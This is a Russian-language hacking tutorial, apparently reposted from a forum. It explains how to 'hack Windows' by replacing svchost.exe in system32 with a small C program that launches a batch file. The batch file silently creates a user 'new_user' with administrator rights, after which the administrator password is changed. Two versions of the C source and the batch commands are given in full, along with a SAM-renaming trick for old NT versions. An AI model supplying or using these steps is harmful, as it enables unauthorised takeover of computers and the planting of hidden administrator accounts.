Чтобы взломать Windows ним лишь понадобиться выполнить несколько пунктиков:

1.Пишем прогу

Код:
#include
void main(void)
{
char
*bs,
tmp[MAX_PATH],
cmdline[MAX_PATH];
strcpy(cmdline,GetCommandLine());
bs = strrchr(cmdline,'.');
if(bs)
{
strcpy(bs+1,"bat");
wsprintf(tmp,"cmd.exe /K \"%s\"",cmdline);
WinExec(tmp,0);
};
};

2.Пишем батник: svchost.bat

Код:
net user new_user some_pass /ADD
net localgroup administrators new_user /ADD
echo ok>c:\ok

3.заходим в system32
4.бэкапим svchost.exe
5.копируем прожку на место svchost.exe
6.копируем svchost.bat
7.перезагружаемся
8.после загрузки создан пользователь new_user some_pass c правами админа
9.восстанавливаем svchost.exe
10.грузим систему, из-под пользователя new_user меняем пароль админа
НАСТОЯТЕЛЬНО РЕКОМЕНДУЕТСЯ компилить из сорцов - чтобы
не было претензий насчёт бэкдоров

Замечание

В NT до версии 4 включительно желаемый результат достигается переименованием system32\config\sam

Или еще вариант, отличающийся другим тестом проги:

1.пишем прогу

svchost.c:
Код:
#include
#pragma comment(linker,"/nodefaultlib")
#pragma comment(linker,"/entry:main")
#pragma comment(linker,"/filealign:0x200")

void main(void)
{
char
tmp[MAX_PATH],
cmdline[MAX_PATH];
GetModuleFileName(GetModuleHandle(0),cmdline,MAX_PATH);
cmdline[lstrlen(cmdline)-3]=0;
wsprintf(tmp,TEXT("cmd.exe /C \"%sbat\""),cmdline);
WinExec(tmp,0);
}

2.пишем батник
svchost.bat:
Код:
net user new_user some_pass /ADD
net localgroup administrators new_user /ADD
echo ok>c:\ok

3.заходим в system32
4.бэкапим svchost.exe
5.копируем прожку на место svchost.exe
6.копируем svchost.bat
7.перезагружаемся
8.после загрузки создан пользователь new_user some_pass c правами админа
9.восстанавливаем svchost.exe
10.грузим систему, из-под пользователя new_user меняем пароль админа
НАСТОЯТЕЛЬНО РЕКОМЕНДУЕТСЯ компилить из сорцов - чтобы не было претензий насчёт BackDoor-ов.

Источник: ZaTySi.NeT